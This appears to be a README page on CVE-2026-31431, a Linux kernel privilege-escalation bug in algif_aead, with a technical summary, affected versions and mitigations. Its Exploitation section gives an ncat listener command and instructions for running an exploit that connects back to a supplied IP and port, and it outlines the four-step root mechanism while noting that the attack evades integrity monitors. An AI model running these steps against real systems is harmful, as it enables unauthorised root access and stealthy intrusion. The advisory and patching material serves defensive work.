## https://sploitus.com/exploit?id=6780F1E2-8E5F-57C6-9A3A-FFCEBCC0A591
# ๐ด CVE-2026-31431 โ "Copy Fail"
### A 9-Year-Old Linux Kernel Logic Bug That Grants Root in Seconds
[](https://nvd.nist.gov/vuln/detail/CVE-2026-31431)
[](#)
[](#affected-versions)
[](#timeline)
---
## Overview
**Copy Fail** is a high-severity local privilege escalation (LPE) vulnerability in the Linux kernel's cryptographic subsystem (`algif_aead`). Discovered and disclosed by **Theori** (via their **Xint Code** AI-assisted vulnerability research tool) on **April 29, 2026**, the flaw allows any unprivileged local user to write 4 controlled bytes into the page cache of any readable file โ and leverage that to obtain **root** on virtually every major Linux distribution shipped since 2017.
A working proof-of-concept exploit is only **~732 bytes of Python**.
---
## Exploitation
1. Start Ncat Listener
```
sudo ncat -lvnp 445
```
2. Execute the exploit on target machine
```
# Using Python script
python3 CVE-2026-31431-Exploit.py IP PORT
# Compiled binary
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
```
---
## ๐งฌ Technical Summary
| Field | Detail |
|---|---|
| **CVE ID** | CVE-2026-31431 |
| **CVSS Score** | 7.8 (HIGH) |
| **Type** | Local Privilege Escalation (LPE) |
| **Component** | `algif_aead` โ Linux kernel AF_ALG userspace crypto interface |
| **Root Cause** | Logic flaw in the `authencesn` AEAD template; an in-place optimization (commit `72548b093ee3`, Aug 2017) causes page-cache pages to appear in the kernel's writable destination scatterlist |
| **Primitive** | 4-byte controlled write into the page cache of any readable file |
| **Exploit Mechanism** | AF_ALG socket โ `splice()` โ page-cache corruption of a setuid binary โ root |
| **Race Condition?** | โ None โ straight-line logic flaw, 100% reliable |
| **Kernel Offset Needed?** | โ No |
| **Fix Commit** | `fafe0fa2995a` (reverts the 2017 optimization) |
### How the Exploit Works (4 Steps)
1. **Open** an `AF_ALG` socket and bind to `authencesn(hmac(sha256),cbc(aes))`
2. **Splice** a readable setuid binary's pages into the socket
3. The kernel's AEAD scratch write overwrites **4 bytes** in the page cache of that binary
4. **Execute** the now-corrupted setuid binary โ **root shell**
### Why It's Dangerous
- **No race window** โ deterministic, works every time
- **No kernel offset / KASLR bypass needed**
- **Same exploit works across distros** โ Ubuntu, RHEL, Amazon Linux, SUSE, Rocky, etc.
- **Container escape** โ the page cache is shared; a write from inside a container affects the host
- **No disk modification** โ file-integrity monitors (AIDE, OSSEC, etc.) won't detect it
- **No forensic trace on disk**
---
## ๐ฏ Affected Versions
| Affected | Not Affected |
|---|---|
| Linux kernel **4.14** through **7.0-rc** | Kernels prior to 4.14 (before Aug 2017 commit) |
| All **6.18.x** prior to **6.18.22** | **6.18.22+** (patched) |
| All **6.19.x** prior to **6.19.12** | **6.19.12+** (patched) |
### Confirmed Vulnerable Distributions
- Ubuntu 24.04 LTS
- Amazon Linux 2023
- RHEL 10.1
- SUSE 16
- Rocky Linux 9.7
> Essentially **every major Linux distribution released since 2017** is affected.
---
## ๐ก๏ธ Mitigation
### 1. Patch (Recommended)
Update your kernel to a version containing fix commit `fafe0fa2995a`. Most major distributions have released or are releasing updated kernel packages.
### 2. Temporary Workarounds
If you cannot patch immediately:
- **Block AF_ALG socket creation** via seccomp policy
- **Blacklist the `algif_aead` module:**
```bash
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo modprobe -r algif_aead 2>/dev/null
```
## โ ๏ธ Disclaimer
This repository is for **educational and defensive purposes only**. The information here is intended to help security teams understand, detect, and mitigate CVE-2026-31431. Always follow responsible disclosure practices and applicable laws.
---
### โญ Star this repo to stay updated on patches and detection guidance.